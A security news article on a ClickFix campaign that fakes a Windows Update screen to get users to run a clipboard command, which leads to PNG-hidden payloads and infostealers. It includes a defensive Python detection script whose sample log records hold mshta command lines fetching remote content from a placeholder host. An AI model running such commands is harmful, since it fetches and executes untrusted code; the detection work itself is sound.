Updated ClickFix Malware Disguised as Windows Update

Key Takeaways

1. ClickFix Malware disguises itself as a legitimate Windows Update to trick users into executing harmful commands.
2. The malware spreads mainly through fraudulent adult websites, presented as ads or age verification prompts.
3. It utilizes pixel data from a PNG file to launch infostealers that capture sensitive personal information.
4. The malware employs obfuscation techniques to evade detection by security software, complicating analysis for cybersecurity professionals.
5. Users are advised to be cautious with domain URLs and avoid clicking ads or executing commands that may expose them to malware.

Cybercriminals have revamped the notorious ClickFix Malware, disguising it as a genuine Windows Update to deceive users into entering a harmful command in the Run window. This tactic is notably clever because it utilizes pixel data from a PNG file to launch infostealers that can capture usernames, passwords, crypto wallet info, bank details, and various personal data.

Discovery by Huntress

Recently, cybersecurity experts from Huntress revealed this new version of ClickFix. The malware creates a full-screen browser window that resembles a legitimate Microsoft Windows update, complete with a progress bar indicating a “critical security update” at 95% completion.

How It Spreads

This malware is predominantly found on fraudulent adult websites that imitate well-known platforms, often masked as advertisements or age verification requests. When users interact with an ad, video, or age verification prompt, they are greeted by the deceptive Windows update interface.

Upon activation, the fake update prompts users to press the Windows key + R to open the Run dialog, paste the malicious command that has already been placed on the clipboard, and in doing so grant the attackers administrative privileges.

Technical Mechanism

Once the command is executed, it launches mshta (Microsoft HTML Application Host) with a URL that serves as the attack vector. This built-in tool retrieves a payload from a hex-encoded URL and runs PowerShell code padded with unnecessary lines, which keeps products such as Bitdefender from detecting or responding to the malicious activity. That code then decrypts a PNG file, extracts shell commands from it, and injects them into processes already running on the user’s system.

Despite looking benign, the PNG image harbors malicious code hidden within its pixel data, which a .NET assembly decrypts. After several further steps, it launches infostealers such as Rhadamanthys or LummaC2, which harvest data and keystrokes for passwords, credentials, and crypto wallets, and then transmit this information to overseas servers.
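A defender-side check for the launch pattern described above, added here as an illustration and not code from Huntress or this article: it scans constructed Sysmon process-creation records for mshta.exe started by explorer.exe (the parent process the Win+R Run dialog uses) with a URL or a long hex-encoded blob as its argument. The sample records, the hex-run threshold and the field names are assumptions made for the example.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 (process creation) records, reduced to the three
# fields this heuristic uses. They are made-up samples, not data from the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\mshta.exe",        # Run dialog -> mshta with a URL
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://update.example.invalid/x'},
    {"Image": r"C:\Windows\System32\mshta.exe",        # same, but the URL is hex-encoded
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"mshta.exe" 68747470733a2f2f7570646174652e6578616d706c652e696e76616c6964'},
    {"Image": r"C:\Windows\System32\mshta.exe",        # local .hta file: not flagged
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Tools\setup.hta'},
    {"Image": r"C:\Windows\System32\notepad.exe",      # unrelated process: not flagged
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# 16 or more consecutive hex byte pairs: a crude signal for a hex-encoded URL/script
HEX_RUN_RE = re.compile(r"(?<![0-9a-f])(?:[0-9a-f]{2}){16,}(?![0-9a-f])", re.IGNORECASE)


def is_clickfix_mshta(event: Dict[str, str]) -> bool:
    """True when mshta.exe is spawned by explorer.exe (what the Run dialog uses)
    with a URL or a long hex blob on its command line."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\mshta.exe"):
        return False
    parent = event.get("ParentImage", "").lower()
    if not parent.endswith("\\explorer.exe"):
        return False
    cmd = event.get("CommandLine", "")
    return bool(URL_RE.search(cmd) or HEX_RUN_RE.search(cmd))


def flagged_command_lines(events: List[Dict[str, str]]) -> List[str]:
    """Return the command lines of all events matching the ClickFix heuristic."""
    return [e["CommandLine"] for e in events if is_clickfix_mshta(e)]


if __name__ == "__main__":
    for line in flagged_command_lines(SAMPLE_EVENTS):
        print("ALERT: mshta launched from Run dialog with remote/encoded argument:", line)
```

A legitimate HTA opened from disk also has explorer.exe as its parent, which is why the rule additionally requires a URL or hex blob rather than alerting on every mshta launch.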

Ongoing Threat

Huntress reported that this version of ClickFix has been active online since early October, with numerous websites still displaying the fake update warning, implemented with varying degrees of sophistication from site to site.

Hackers conceal harmful code within seemingly innocent images or clutter the code with unnecessary lines, a form of obfuscation that can confuse cybersecurity professionals scanning for malicious activity. Huntress has noted peculiar elements in the code, including a quote from a past UN meeting: “With regard to stage III, we highly recommend the complete destruction of all weapons, as lasting peace cannot be ensured otherwise.”

This ClickFix Windows Update malware stands out as one of the most cunning and malevolent forms of infostealing observed thus far. Users are strongly advised to scrutinize domain URLs and to refrain from clicking on ads or executing commands on their devices at a website’s request, since doing so can unwittingly open the door to advanced malware like ClickFix.
